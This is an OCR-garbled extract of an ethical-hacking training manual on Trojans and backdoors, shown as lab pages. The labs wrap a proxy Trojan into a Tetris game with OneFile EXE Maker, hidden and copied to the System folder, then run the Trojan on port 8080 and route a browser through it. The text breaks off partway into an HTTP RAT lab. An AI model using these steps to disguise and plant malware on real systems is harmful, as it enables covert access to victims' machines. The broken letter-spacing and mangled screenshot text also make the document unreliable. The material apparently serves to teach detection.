:

o r k g r o u p :

D a t a :

a m

P a t h :

P r o d u c t

o f

In f o r m

N

in d o w s

S y s t e m

In t e r n e t

c r e a tio n

P C

C o m

P r o R a t

C o l l e c t e d / O

N

O

9 / 2 3 / 2 0 1 2

R e q u ir e d

0

N

o

0

!L a b s

S u p p o r t e d

C la s s r o o m



Lab

W r a p p in g a T r o ja n U s in g O n e F ile
EX E M aker
A Trojan is a program th a t contains m alicious or harm ful code inside apparently
harm lessprogram m ing or data in such a way th a t it can g e t control and cause
I CON
£ 1 7

KEY

V a lu a b le

S o m

e t im

e s

a n

a tta c k e r

m a k e s

g e t

a

a

v e r y

s e c u r e

b a c k d o o r

e v e n

m

o r e

s a fe r

t h a n

th e

p a s s w o r d

f o r

in f o r m a tio n
n o r m
T est yo u r
k n o w le d g e

W e b

e x e r c is e

a l w a y
th e

to

a tta c k e rs

le t

f r o m


th e
a

s y s te m ,

o t

th e

v ic t im

c o m

m

b a c k d o o r
A c t i v e X

1 11

to

o r d e r

to

k e e p

v o ic e
y o u r

c r e a tin g

a y

a n

s y s te m .

m

is

n o r m
th e

in

a

o s t

to

o n ly

g e t

a l

th e

in t o

fu tu r e .

I t

th e

v is it s

w e b s it e s

a tta c k s

b y

is

a

la y e r s

v ic t im

s y s te m

in .

A f t e r

g e t t in g

a s

a

b a c k d o o r

e a s y

a tta c k e r

a s

s h o w

a

n e e d
th e

a

b e d d e d

m e s s a g e

a n d

p r o t e c t in g

in s ta ll

e m

0 1‫ ־‬v e r if y in g

0 11

r u n n in g

c a n

w e b s it e ,

T r o ja n s

a n d

0 1‫ ־‬S S H

th e

in s ta lls

a p p lic a tio n s ,

b a c k d o o r s

o n e

lo g g in g

w a y

u s e r
o f

u s e

a tta c k e r

A n o t h e r

M

a y

a u th e n t ic a tio n s

h a r d e r

a c c e s s

f r o m

a n d

m

a n y

d o w n lo a d in g

s y s te m

T r o ja n s

it

lie n e v e r

c h a t,

u s e r

w it h

a c h in e .
W

a l

n e e d

a tta c k e r ,

0 1‫ ־‬h e r
m

th e

0 1 1

f o r

p r o t e c t
0 1 1

111s

n o r m

m

p a r e d

b y

A c t iv e X .

r u n

A

U s u a lly

c o m

v ic t im

u s in g

A c t i v e X

k n o w le d g e

s y s te m .

s y s te m

th e

0 1 1

is

s y s te m .

b a c k d o o r

th e

v ic t im

c o u ld

r u n n in g

a

b a c k d o o r s

s y s te m

a n d

in t o
b u t

u s e

in s ta lle d

c o n t r o l

‫ט‬

to

u s in g

th e

a b o u t
u s e r .

e x t e n s iv e

s y s te m

f r o m

a tta c k e rs .

Y o u

a re

in c lu d e
t h e ft

& Tools

a

s e c u r ity

p r o t e c t in g

o f v a lu a b le

a d m
th e

d a ta

in is t r a t o r
n e t w o r k
f r o m

o f y o u r
f r o m

th e

c o m

p a n y ,

T r o ja n s

n e t w o r k ,

a n d

a n d

a n d

y o u r

jo b

b a c k d o o r s ,

id e n t it y


T r o ja n

a tta c k s ,

th e ft.


demonstrated in
this lab are

T h e

available in

a tta c k s .

o b je c t iv e

o t

t in s

la b

is

to

h e lp

s m d e n ts

le a r n

to

d e te c t

T r o ja n

a n d

b a c k d o o r

D EH
:C T h e

o b je c tiv e s

o f

th e

la b

in c lu d e :

ToolsCEHv8
Module 06 Trojans

■

W

r a p p in g

■

R u n n in g

a

T r o ja n

w it h

a

g a m e

111

W

in d o w s

S e r v e r

2 0 0 8

and Backdoors


th e

T r o ja n

to

a c c e s s

th e

g a m e

0 1 1

th e

f r o n t

e n d



■

A n a ly z in g

th e

T r o ja n

r u n n in g

in

b a c k e n d

T o

c a r r y

‫י‬

o u t

d iis , y o u

n e e d :

OneFileEXEMaker

t o o l lo c a t e d

D:CEH-ToolsCEHv8 Module 06

a t

Trojans and BackdoorsWrapper Covert ProgramsOneFileExeMaker
■

A

Window Server 2012


■

I t

y o u
th e

111

■

d e c id e
la b

m

t o

d o w n lo a d

ig h t


r u n n in g

th e

(h o s t)

111 v ir t u a l m a c h in e

latest version,

t h e n

s c r e e n s h o ts

s h o w n

d if f e r

p r iv ile g e s

to

m

n

t o o ls

T u n e :

2 0

M in u t e s

A

T r o ja n

h a r m le s s

is

a


Note:
w h a t
d ie

H

TASK

1

OneFile EXE
Maker

T h e
is

111

p r o g r a m

d ia t

a s

d ie

p ro c e s s e s

la b ,
is

o f

b u t

s a m e

d a ta

d ie

r u in in g

v e r s io n s

c o n t a in s

o r

h ie

d ie
d ie

a s

111

malicious

s u c h

a llo c a tio n

c r e a te d

c lie n t

a c tu a l p ro c e s s

s h o w n

111 d iis

a

w a y

t a b le

o r
o f

o r
th a t

o n

a

h o s t

h a r m fu l
it

h a rd

a n d

c o n n e c t in g

c o d e

in s id e

a p p a r e n d y

get control

c a n

a n d

c a u s e

d n v e .

a p p e a r a n c e
to

d ie

m a y

s e r v e r

d itfe r

a n d

fr o m

a c c e s s in g

la b .

La b T ask s
1.

In s ta ll

OneFileEXEMaker
S e n n a S p y O n e EX E M a k e r 2 0 0 0

o n

Windows Server 2008

V ir t u a l M a c h in e .

2 .0 a

S e n n a S p y O n e E X E M aker 2000 - 2.0a
Official Website:
e-m a il:

http://sennaspy.tsx org

s e n n a _ s p y 0 h o lm a 1l.c o m

IC Q U IN

3973927

J o in m a n y file s a n d m a k e a u n iq u e E X E file .
T h is p io g ra m a llo w io in a ll k in d o f file s :

e x e , d ll. o c x . t x t . jp g . b m p

A u to m a tic O C X f ile re g is te r a n d P a c k file s s u p p o rt
W in d o w s 9 x . N T a n d 2 0 0 0 c o m p a tib le !

S h o rt F ile N a m e

P a ra m e te rs

10 p e n M o d e | C o p y T o

Command Line Parameters.

m

Open Mode

C o p y rig h t ( C ) . 1 9 9 8 - 2 0 0 0 . B y S e n n a S p y

F IG U R E


Copy To---

| A c tio n

Action---

pnEeue
C Nr a (“Wdw C Oe/xct
om
l
ino s
C Mime C Sse C CpOly
a izd yt m
x
oy n
C Mime C Tm
in izd
ep
C Ro
ot
C He
id

3 .1 : O n e F i l e E X E

r

P a ck Fies?

M a k e r H o m e s creen



C lic k

d ie

a d d

Add File

b u tto n

a n d

b r o w s e

to

th e

C E H - T o o ls

fo ld e r

a t

Z:CEHv8 Module 06 Trojans and BackdoorsGamesTetris

lo c a t io n

Lazaris.exe

th e

d ie
a n d

lile .

S e n n a S p y O n e EXE M a k e r 2 0 0 0 - 2 .0 a


Official Website: http://sennaspy tsx org
le s s ! Y o u c a n s e t v a r io u s
e-m a il:

t o o l o p t io n s a s O p e n

s e n n a _ s p y @ h o tm a 1l.c o m

m o d e , C o p y to , A c t io n

IC Q U IN

3973927

T h is p ro g ra m a llo w jo in a ll k in d o f file s :

e x e . d ll. o c x . t x t . jp g . b m p .


[ s h o r t F ile N a m e

|P a r a m e t e r s

| 0 p e n M o d e |C o p y T o

L A Z A R IS .E X E

H id e

S y s te m

| A c tio n

!

A dd F ie

| O p e n /E x e c u te

1
Getete

S ave

Ejj*

C
r
C
(5‫־‬


F IG U R E

3 .

Add File

C lic k

Copy T 0 -------

Open Mode

Command Line Parameters

a n d

b r o w s e

Normal
Maximized
Minimized
Hide

C
(*
C
C

W indows
System
Temp
Root

(•

Open/Execute

C

Copy On|y

3 .2 : A d d i n g L a z a r i s g a m e

to

th e

C E H - T o o ls

fo ld e r

a t

d ie

lo c a t io n

Z:CEHv8 Module 06 Trojans and BackdoorsTrojans TypesProxy Server
Trojans

a n d

a d d

d ie

mcafee.exe

file .


Official Website: http://sennaspy.tsx.org
e-m a il:

s e n n a _ s p y @ h o tm a il.c o m

IC Q U IN

3973927

T h is p ro g ra m a llo w jo in a ll k in d o f file s :

e x e . d ll. o c x . t x t . jp g . b m p

A u to m a tic O C X f ile re g is te r a n d P a c k file s su p p o rt
W in d o w s 9 x . N T a n d 2 0 0 0 c o m p a tib le I

& Tools
demonstrated in


P a ra m e te rs

| O pen M ode | Copy To

|A c tio n

S y s te m
I S y s te m

this lab are

A dd F ie

O p e n /E x e c u te
| O p e n /E x e c u te

dlee
et

available in

Save

D EH
:C ToolsCEHv8


O pen Mode

Module 06 Trojans
and Backdoors


F IG U R E

4 .


S e le c t

Mcafee

a n d

ty p e

C
C
C
(*

Normal
Maximized
Minimized
Hide

Copy To!------C
(*
‫׳‬
C

W indows
System
Temp
Root

Action--(
•

Operv‫׳‬Execute

C

r

P a c k F ie s ?

Copy Only

3 .3 : A d d i n g M C A F E E . E X E p r o x y s e r v e r

8080 1 1 1

d ie


fie ld .




2 .0 a

S e n n a S p y O n e E X E M aker 2000 2.0 ‫־‬a

Official Website
e-m a il:

http://sennaspy.tsx org


IC Q U IN :

3973927

T h is p io g ra m a llo w !o in a ll k in d o f file s :

e x e . d ll. o c x . t x t . jp g . b m p

A u to m a tic O C X f ile !e g is te i a n d P a c k file s s u p p o rt


P a ia m e te r s

O pen M ode

Copy To

A c tio n

S y s te m

L A Z A R IS .E X E


Sv
ae
Command Line Parameters:

O pen M ode—


F IG U R E

5.

S e le c t

Lazaris

a n d

c h e c k


d ie

Copy To-------

Normal
Maximized
Minimized
Hide

C
C
C
^

C
(*
C

O p en/Execute

W indows
System
Temp
Root

‫“י‬

P *k F te s ?

Copy On|y

C

3 .4 : A s s i g n i n g p o r t 8 0 8 0 t o M C A F E E

Normal

o p t io n

in

Open Mode.

2 .0 a

S e n n a S p y O n e E X E M aker 2000 2.0 ‫־‬a

Official Website: http://sennaspy tsx org
e-m a il:


IC Q U IN

3 9 /3 9 2 7

T h is p io g ra m a llo w jo in a ll k in d o f file s :

e x e . d ll. o c x . t x t . ip g . b m p ...


A dd F ie
L A Z A R IS .E X E
M C A FE E EXE

N o tm a l
8080

( S y s te m

H id e

I O p e n /E x e c u te I

S y s te m

Delete


Sv
ae
Exit
O pen Mode


Copy To-------

‫. ־׳‬Maximize
: .01™
Jaximized
1p ‫״‬
^ © 2 C o p y rig h t ( C ) . 1 9 9 8 2 0 0 0 . B y S e n n a S p y

F IG U R E

6 .

C lic k

Save

a n d

b r o w s e

to

C
C

Minimized
Hide

C

W indows

<• System
C Temp
C Root

Action
(
•

Operv‫׳‬Execute

C

r

P a ck Fies?

Copy On|y

3 .5 : S e t t i n g L a z a r i s o p e n m o d e

s a v e

d ie

d ie

o n

th e

d e s k to p ,

a n d

n a m e

d ie

t ile

Tetris.exe.




Save n
1

Name
e-m a il:

sennas

| K

2 [

*■

I - I Size

0‫נ® ־‬

1*1 Type

₪ ‫־‬

a

1 *1 D ate modified

1

^ b
Pu k
: ■ Computer
® N e tw o rk
® M o z ia F re fb x
£

1 KB

Shortcut

2 KB

Google Chrome

Shortcut

9 /1 8 /2 0 1 2 2:3 1 Af
9 /1 8 /2 0 1 2 2 :3 0 AT

_l

(Executables (*.exe)

M C A F E E .E X E

±1

|------- Save------- 1

|t * H

Cancel

_^J

|

Save

L

O pen M ode

‫־‬

(
•
C
C
C

C o p y rig h t (C ). 1 9 9 8 - 2 0 0 0 . B y S e n n a S p y

F IG U R E

m

7 .

N

o w

d o u b le - c lic k

M C A F E E . E X E w ill

,

ru n in b ack g ro u n d

g am €>

to

o p e n

d ie

Copy To

Normal
Maximized
Minimized
Hide

C
(*
("
C

W indows
System
Temp
Root

(
•

Open/Execute

C

r

P a ck Fies?

Copy 0 n|y

3 .6 : T r o j a i i c r e a t e d

Tetris.exe

file .

T liis

w ill

la u n c h

d ie

L a z a r is

it

McAfee

,

011 t h e

tr0 1 1 t e ‫ ״‬d •

r
F IG U R E

8 .


N

o w

is

o p e n

Task Manager

a n d

3 .7 : L a

c lic k

d ie

2a r is g a m e
Processes

m n n in g .

ta b

to

c h e c k



^ ‫[*[ ס‬

O Windows Task M anager
File

O ptions

V iew

Applications

Help

P ro ce s s e s j Se rv ic e s | P erfo rm a n c e j Netw orking | U s e rs |

Im a g e . . .

1 U ser Nam e 1 c p u ]
[

M em ory (. .. | Description

cs rs s .ex e

SY ST E M

00

1 .4 6 4 K

Client S e r . ..

cs rs s .ex e

SY ST E M

00

1 .7 3 6 K

Client S e r ...

d w m .e x e

Adm lnist...

00

1,200 K

D e s k t o p ...

ex p lo re r.e x e

Adm m ist.. .

00

14,804 K

L A Z A R IS .E X E ...

Adm lnist. ..

00

1 .5 4 0 K

Is a ss .ex e

SY ST E M

00

3,100 K

Local S e c u ...

Ism. e x e

SY ST E M

00

1 .3 8 4 K

|

Local S e s s ...

1 M C A F E E .E X E .. .

1

W in d o w s . . .
L A Z A R IS

A d m n s t ...

00

580 K

m sd tc.ex e

N ET YV O ...

00

2 .8 3 2 K

S c re e n p re s s o ... .

Adm inlst. ..

00

2 8 .3 8 0 K

S c re e n p r e ...

s e rv ic e s .e x e

SY ST E M

00

1 .9 9 2 K

Se rv ic e s a .. .

S L s v c .e x e

N E T V /O . ..

00

6 .7 4 8 K

M ic ro s o ft...

sm ss.ex e

SY ST E M

00

304 K

W in d o w s ...

s p o o ls v .ex e

SY ST E M

00

3 .5 8 8 K

Sp oo ler S . . .

s v c h o s t.e x e

SY ST E M

00

13,508 K

H o s t P r o c ...

s v c h o s t.e x e

LO C A L ...

00

3.648 K

H o s t P r o c ...

-

I*

M C A FEE
M S D T C co ...

Sh o w p ro cesses from all u sers

| jP ro :e s s e s : 40

C P U U s a g e : 2°.‫׳‬c

F IG U R E

■

gnc| p rocess

Ph ysical M em ory: 43°.‫׳‬c

3 .8 : M C A F E E i n T a s k m a n a g e r

L a b A n a ly s is
A n a ly z e
y o u r

a n d

t a r g e t ’s

d o c u m e n t
s e c u n ty

th e

r e s u lts

p o s tu r e

a n d

r e la te d

to

e x p o s u r e

d ie

la b

th ro u g h

e x e r c is e .
p u b lic

a n d

G iv e
fre e

y o u r

o p in io n

o n


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.

T o o l / U

t i l i t y

In f o r m

E

a k e r

O

X

E

M

a t i o n

u t p u t :

C o l l e c t e d / O

U s in g

a

b a c k d o o r

b j e c t i v e s

e x e c u te

A c h i e v e d

Tetris.exe

Q u e s t io n s
1.

U s e
O

2 .


v a r io u s

o th e r

n e F ile E X E M

H o w

y o u

o p t io n s

a k e r

w ill s e c u re

a n d

fo r

d ie

a n a ly z e

y o u r

O p e n

th e

c o m p u t e r

m o d e ,

C o p y

to , A c t io n

s e c t io n s

o f

r e s u lts .

fr o m

O

n e F ile E X E M

a k e r

a tta c k s ?



In t e r n e t

□

Y e s

P la t f o r m

0


C o n n e c t io n

R e q u ir e d

0

N

o

0

iL a b s

S u p p o r t e d

C la s s r o o m



P ro x y S e r v e r T ro ja n
A . Trojan is a program th a t contains m alicious or harm ful code inside apparently
harm less program m ing or data in such a way th a t i t can g et control and cause
I CON

KEY

P~/ Valuable
information

Y o u

a re

in c lu d e

Test vom
‫׳‬
knowledge

— Web exercise
m Workbook review

t h e ft

a

s e c u r ity

a d m

p r o t e c t in g

o f v a lu a b le

in is t r a t o r

th e

d a ta

n e t w o r k
f r o m

o f y o u r
f r o m

th e

c o m

p a n y ,

T r o ja n s

n e t w o r k ,

a n d

a n d

a n d

y o u r

jo b

b a c k d o o r s ,

id e n t it y


T r o ja n

a tta c k s ,

th e ft.

T h e

o b je c tiv e

o f

t in s

la b

is

to

h e lp

s tu d e n ts

le a r n

to

d e te c t

T r o ja n

a n d

b a c k d o o r

a tta c k s .

T h e

o b je c tiv e s

o f t in s

•

S t a r tin g

M

•

A c c e s s in g

la b

c A f e e

th e

in c lu d e :

P r o x y

In t e r n e t

u s in g

M

c A le e

P r o x y

T o

c a r r y

o u t

t in s , y o u

■ McAfee

n e e d :

T r o ja n

lo c a t e d

D:CEH-ToolsCEHv8 Module 06 Trojans and

a t

BackdoorsTrojans TypesProxy Server Trojans
JT Tools
■

demonstrated in
this lab are

A

c o m p u t e r m

n n in g

Window Server 2012


m

n n in g

in

(h o s t)


available in
D EH
:C -

■

ToolsCEHv8

I f
111

y o u
th e

d e c id e
la b

t o

m

ig h t

a

w e b

d o w n lo a d

th e

latest version,

t h e n

s c r e e n s h o ts

s h o w n

d if f e r

Module 06 Trojans
‫י‬

Y o u

‫י‬

and Backdoors

n e e d


b r o w s e r

p r iv ile g e s

to

to

a c c e s s

r u n

In t e r n e t

t o o ls

T im


e :

2 0

M in u t e s



A

T r o ja n

h a r m le s s

is

a

Note:

d ie

£

TASK

Proxy server

th a t



w h a t

p r o g r a m

T h e
it is

111

a s

v e r s io n s
d ie

p ro c e s s e s

o r

la b ,

is

o f

h ie

th e

b u t

s a m e

d a ta

d ie

r u in in g

as

malicious

c o n t a in s
in

s u c h

c re a te d

d ie

a

a llo c a tio n

c c lie n t

a c tu a l p ro c e s s

s h o w n

111 d iis

w a y

t a b le

o r

0 1‫ ־‬h a r m fu l
th a t

0 11 a

h o s t

it

a n d

in s id e

a n d

c a u s e

d iffe r

fr o m

d r iv e .

a p p e a r a n c e

o f c o n n e c t in g

a p p a r e n tly

get control

c a n

h a rd

c o d e

to

d ie

m

a y

s e r v e r

a n d

a c c e s s in g

la b .

La b T ask s
-

Mcafee

1.

I n

W

in d o w s

S e r v e r

2 0 0 8

V ir t u a l M a c h in e , n a v ig a t e

to

Module 06 Trojans and BackdoorsTrojans Types,
Proxy Server Trojans

a n d

CmdHere

s e le c t

jr a C >

view

fr o m

d ie

r ig h t- c lic k

c o n te x t m e n u .

|i■ * CD-v3'‫־‬
teduc05Tro:o‫««־‬nd30ccdo0f3 - "rojanaTypes

Pit

Z:CEHv8

a n d

Edt

Toos

Orgsncc »

ndp

Vca ‫־‬
s

*

w

S 's ® 1 '
‫״‬

F

Nn‫ - - •״‬C*»nodri«d M Tvp#
j , Bt*d©«rry T'OJjn

pi Documents

J(
T'0j*tk
,Jf Canrund 5h*l "rajjin*
J j D*tac«‫׳‬rwntT0‫|׳‬an«

£ Picture*
^ Mjflic

M Sat

M

J f Destruetve Trojans
J t awnonc Trojans

‫־‬
•tore »
Folders

JtE-f'd l r3:3rs
Jk F T Tro» r
J t G J: Trojars
JlMTPh-TTFST'Ojans
JtlO P B d C W o o ‫־‬
j.MACOSXTtoaTS

‫׳יי‬

J i Reosrv Montor

_±_

| . Startup P'cgfarr* W
JA ‫ ־‬rojansT/pes
3ladd>e‫־‬ry Trojan
| . Comrrand Srel Trt

R=nctc A
<
J t VMC ‫ ־‬raja

j. 3ef3GemertTro;a•
( . 3estrjc&'/e “ rojor

COer
R»stora previOLS versions

J . EbankirgT-qjarts

1.

SerdTo

Trojors

i . '^PT'cjon
i . SUIT'ojans

C30V

L. -TIP t-rr‫־‬P5 Tro;a

C‫׳‬eare9xjrtcjt
Delete

I , :CKPBdCkdCOr

Rename

Proxy Se‫־‬ver Troji

Prooenes

Jg 35PtOtv TrQ*
-

►

Q it

.. t i n m i G H ‫. ־־ :־‬

F I G U R E 4 .1 : W i n d o w s S e r v e r 2 0 0 8 : C m d H e r e

2 .

N

o w

ty p e

d ie

c o m

m a n d

dir

to

c h e c k

fo r

fo ld e r

c o n te n ts .

F I G U R E 4 .2 : D i r e c t o r y l i s t i n g o f P r o x y S e r v e r f o l d e r

3 .


T h e

f o llo w in g

im a g e

lis t s

d ie

d ir e c to r ie s

a n d

file s

111

th e

fo ld e r .


M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs

-1‫ |ם‬x

|Z:C v8 M d le 0 Trojans a d BackdoorsSTrojans TypesProxy Server Trojans>dir
EH
ou 6
n
IU
olune in drive Z h s n label.
a o
I U lune Serial N me is 1 7 - D C
o
u br
6 77 A
I Directory of Z:C v8 M d le 0 Trojans a d BackdoorsVTrojans TypesProxy Serve
EH
ou 6
n
Ir Trojans
1 9 1 / 0 2 01:07A < IR
0 / 92 1
M D>
1 9 1 / 0 2 01:07A < IR
0 / 92 1
M D>
1 2 1 / 0 6 1 :4 A
0 / 72 0 1 3 M
5 8 ncafee.exe
,32
1 9 1 / 0 2 01:07A < IR
0 / 92 1
M D>
W b r0 y Tr0j4nCr34t0r <u n Nn >
3P x
F n y ae
1 File<s>
rile^s;
5 2 bytes
b,J28
,3 8
3 D s 208,287,793,152 bytes free
ir< >
Z:C v8 M d le 0 Trojans a d BackdoorsSTrojans TypesProxy Server Trojans>
EH
ou 6
n
—

m
FIGURE 4 : C
.3 ontentsinProxyServer folder
Type die command m cafee 8080 to m il the service 111 W indow s Server
2008.

FIGURE 4 : Starting m
.4
cafee tool onport 8 8
00
5.

The service lias started 011 port 8080.

6.

N o w go to W indow s Server 2012 host machine and configure the web
browser to access die Internet 011 port 8080.

7.

1 1 diis lab launch Clirom e, and select Settin g s as shown 111 die
1
follow ing figure.
Q

m
Tliis process can b
e
attained in any browser
after settingdie LAN
settings for die respective
browser

2

ww
w googtorofv ■

*

lo*r

C.pj
ico* •

O

G o o g le
XjnaNCMm-

1- ‫״‬n• ...
1‫״ ׳‬
■ •
w
FIGURE 4 : Internet option of abrowser in Windows Server 2 1
.5
02



8

.

C lick the Show advanced setting s 1 1 k to view the Internet settings.
11

FIGURE 4 : Advanced Settings of Chrome Browser
.6
9.

1 1 N etw ork Settin gs, click Change proxy settings.
1
C 0 chcyn
r cv/dV flM ttnpt/
O .'M

I Clvotue

Settings
4 Enitoir AutaMtc M Ml *«Dtom n *u«9« c»rt. VUu)tAdofl1<nflf(

M e
ttmric
focgkOvcmt isu9ncy»<»compute;s>tt«rnpo*>s«rtnastccon>1ectc the r t>o fc
< ><.

| OwypwstBnjt-

it

(U M jtwn r 1l* ju9 I w
Q th « > n * «

Downoads
C laadkcabot: C.'lherrAi r
ovm
nncti rt0AT0T 1 o> i
t <
U Ast »hw 1 mt «Kt! lit M m dw 0 <
0
»«1 > «9
M
TTPS/SM
.

FIGURE 4 : C
.7 hangingproxyse g ofC
ttin s hrom Browser
e
10. 1 1 die Internet Properties w indow click LAN setting s to configure
1
proxy settings.




Internet Properties
General [ Security ] Privacy ] Content

Connections | Programs ] Advanced

To set up an Internet connection, dick
Setup.

Setup

Dial-up and Virtual Private Network settings

Choose Settings if you need to configure a proxy
server for a connection.
(•) Never cfal a connection
O Dial whenever a network connection is not present
O Always dal my default connection

Current

Sgt default

None

Local Area Network (LAN) settings ------------------------------------------------LAN Settings do not apply to dial-up connections.
Choose Settings above for dial-up settings.

OK

] |

|

LAN settings

Cancel J

|

ftpply

FIGURE 4 : LAN Setting ofaC
.8
s
hrom Browser
e
11. 1 1 die Lo cal A rea N etw ork (LA N ) Settin g s w indow, select die U se a
1
proxy server for your LAN option 111 the Proxy server section.
12. En ter die IP address o f W indow s Server 2008, set die port number to
8080, and click OK.

FT

Local Area Network (LAN) Settings

Automatic configuration
Automatic configuration may override manual settings. To ensure the
use of manual settings, disable automatic configuration.
@ Automatically detect settings
‫ ח‬Use automatic configuration script
Address
Proxy server
Use a proxy server for your LAN (These settings will not apply to
dial-up or VPN connections).
Address:

10.0.0.13

Port:

8080

Advanced

I IBypassp x server far lo a a d ss s!
ro y
c l d re e
OK

Cancel

FIGURE 4 : Proxyse g ofLAN inC
.9
ttin s
hrom Browser
e
13. N o w access any web page 111 die browser (example: www.bbc.co.uk).




FIGURE 4 0 Accessingweb p eusingproxy server
.1 :
ag
14. The web page w ill open.
15. N ow go back to W indow s Server 2008 and check die command
prom pt.
A d m in istra to r C:W m dow* s y *te m 3 2 c m d .e x e - m c a fe e 8 0 8 0

m
Accessingweb p e
ag
usingproxy server

ww
w .google.co : /conplete/search?sugexp=
chrom
e,nod=
18&client=h n 8 l= r :1 0
c ro e rh e 2 0
.U 8 = b.co-|
S rq b c
Accepting Nw Requests■
e
ww
w .google.co :1 0
20
/conp
lete/search?sug =
exp chrom
e,nod 188tclient sch n 8 l= n
=
‫ ־‬ro e rh e
l~U q=
S& bbc.co.u
Accepting Nw Requests!
e
e
Accepting Nw R q e
e e u■
* * ‫^ ־‬
/co lete/search?sugexp chroroe,nod 188tclient =h n 8 l= r
np
=
=
c ro e th e
l- S& b c.co.uk
U a= b
| / :bbc.co.uk :1 0
31
H c c e p t i n g N ew Kequests
■
e
/ :ww
w.bbc.co.uk :1 0
20
e
e
e
e
e
e
e
static .bbci.co.uk: /franeworks/barlesque/2.10.0/desktop/3.5/style/r*ain.css :2 0
0!
e
static.bbci.co.uk: /bbcdotcon/0.3.136/style/3pt_ads .css :20 !
0
Accepting Nw R
e equests!____________________________________________
FIGURE 4 1 Background information on Proxy server
.1 :
16. You can see diat we had accessed die Internet using die proxy server
Trojan.

L a b A n a ly s is
Analyze and document die results related to die lab exercise. G ive your opinion on
your target’s security posture and exposure dirough public and tree inform ation.




P LEA S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T IO N S
R E L A T E D T O T H I S LAB.

T o o l/ U tility

In fo rm a tio n C o lle c te d / O b je ctive s A ch ie ve d

Pro x y Server
T ro ja n

O u tp u t: U se the proxy server T rojan to access the
In tern et
Accessed webpage: w w w .bbc.co.uk

Q u e s t io n s
1.

Determ ine whether M cAfee H T T P Proxy Server Trojan supports other
ports that are also apart from 8080.

2.

Evaluate the drawbacks o f using the H T T P proxy server Trojan to access
the Internet.

In te rn e t C o n n ectio n R e q u ire d
0 Y es

□ No

P la tfo rm Su p p o rted
0 C lassro om


□ !Labs



H T T P T ro ja n
A . T ro ja n is a p ro g ra m

th a t c o n ta in s m a lic io u s o r h a rm fu l co d e in s id e a p p a re n tly

h a rm le s s p ro g ra m m in g o r d a ta in
d am ag e, su ch a s m in in g th e f ile

I CON

KEY

/ V a lu a b le
'
in fo r m a tio n

S

T est yo u r
k n o w l e d g e ____________

*

W e b e x e rc is e

su ch a

lr a y

th a t it

ca n g e t c o n tro l a n d cau se

a llo c a tio n ta b le o n a h a rd d riv e .

Hackers have a variety ot m otives fo r installing m alevolent softw are (m alw are).
This types o f softw are tends to vield instant access to the system to
continuously steal various types o f inform ation from it, fo r exam ple, strategic
com pany’s designs 01‫ ־‬num bers o f credit cards. A backdoor is a program or a set
o f related program s that a hacker installs 011 the victim com puter to allow
access to the system at a later tim e. A backdoor’s goal is to rem ove the evidence

£ Q ! W o r k b o o k r e v ie w

o f in itia l entry from the systems log. H acker—
dedicated websites give examples
o f m any tools that serve to in stall backdoors, w ith the difference that once a
connection is established the intruder m ust log 111 by entering a predefined
password.
Y o u are a Secu rity A dm inistrator o f your com pany, and your job responsibilities
include protecting the netw ork from Trojans and backdoors, T rojan attacks,
theft o f valuable data from the netw ork, and identity theft.

L a b O b j e c t iv e s
The objective o f tins lab is to help students learn to detect T rojan and backdoor
attacks.
H Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors

The objectives o f the lab include:
•

T o run H T T P T rojan 011 W indow s Server 2008

•

Access the W indow s Server 2008 m achine process list using the H T T P
Proxy

•

K ill running processes 011 W indow s Server 2008 V irtu al M achine

To carry out diis, you need:




‫י‬

H TTP RAT located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and
BackdoorsTrojans TypesH TTP H T T PS TrojansH TTP RAT T R O JA N

■

A com puter running W indow Server 2008 (host)

■

W indow s 8 running 111 Virtual M achine

■

W indow s Server 2008 111 Virtual M achine

■ I f you decide to dow nload the la te s t versio n , then screenshots shown
in the lab m ight d iffer
■

Y o u need a w eb browser to access In tern et

■

Adm inistrative privileges to run tools

Tim e: 20 M inutes

O v e r v ie w


A Trojan is a program that contains m alicio u s or harm ful code inside apparently
harmless programming or data 111 such a w ay diat it can get co n tro l and cause
damage, such as ruining die file allocation table on a hard dnve.
Note: The versions o f die created client or host and appearance m ay differ from
w hat it is 111 die lab, but die actual process o f connecting to die server and accessing
die processes is same as shown 111 diis lab.

Lab T ask s
HTTP RAT

1.

Log 111 to W indow s 8 Virtual M achine, and select die Sta rt menu by
hovering die mouse cursor on die lower-left corner of die desktop,

u

Rtcytlt D
m

*

a
M
o»itla
firefox

Google
Chremr

Windows 8 Release Previev.
‫ח ■׳‬
>
‫ז‬
8

Evaluation copy Build 840C

FIGURE 5 :Windows 8Startm u
.1
en
2.

Click Se rvice s ui the Sta rt menu to launch Services.


S ta rt

Google
Chrome
m

m
9

Video

Mozilla
Firefox
................. ‫5 י‬

4

‫י‬

services

*
< 3,

W ier
eaO

rm
m

■

B

Calendar

Intonei Explorer

O ktop
cB

Uapt

a

m

>PP1:1 ■: h e " u '.a

Wide Web Publisher is
m
andatory a HTTP RAT
s
runs on port 8
0

Slcfe

S

SfcyDrwe

^

FIGURE 5 :Windows 8Startm uA
.2
en pps
_ . ,,
_
3. D isable/Stop W orld W ide W eb Publishing Services.
File

Action

View

Hdp

+ 1H 1a m 0 ebi »
Services ; lo c a l)

World Wide Web Pubbhng Service

Name

Description

Status

Startup Type

Log A

3 4 ‫־‬Windows Firewall

Windows F1
._

Running

Automatic

Loc

Windows Font Cache Service Optimizes p...

Running

Automatic

Loc

Windows Image Acquisitio...

Manu3l

Windows Installer
Description:

Provides im...
Adds, modi...

Menusl

Loc

Provides Web comectr/rty and
admin straton through the Interret

Automatic

LOC

•^W indows Media Player Net...

V Windows Management Inst.. Provides a c...
Shares Win...

Manual

Net

Infemotion Services Manager

‫ ־‬W in d o w s Modules Installer
^

Enables inst...

Manual

£$ V/indows Process Activatio...

TheWindo...

‫ $ ׳‬Windows Remote Manage...
£

Running

Windows R...

Running

Manual
Menusl

Net

Running

Automatic (D._

Loc

Provides inf...

M enjsl (Tng...

LOC

Maintains d...

Manual (Tng..

Loc

Enables th e ...

Manual (Tng...

Loc

Windows Search

Provides CO.-

Windows Store Service (W5...
Windows Tim#
Q Windows Update

*%W'1
nHTTP Web Proxy Auto ... WinHTTP i...
'•& WLAN AutoConfig
■I^WM Performance Adapter

Running

Provide; p#..

Workstation
P I World Wide Web Publnhin...
. WWAN AutoConfig

Menusl

Loc

Manual

L0C

Menual

The W ired...
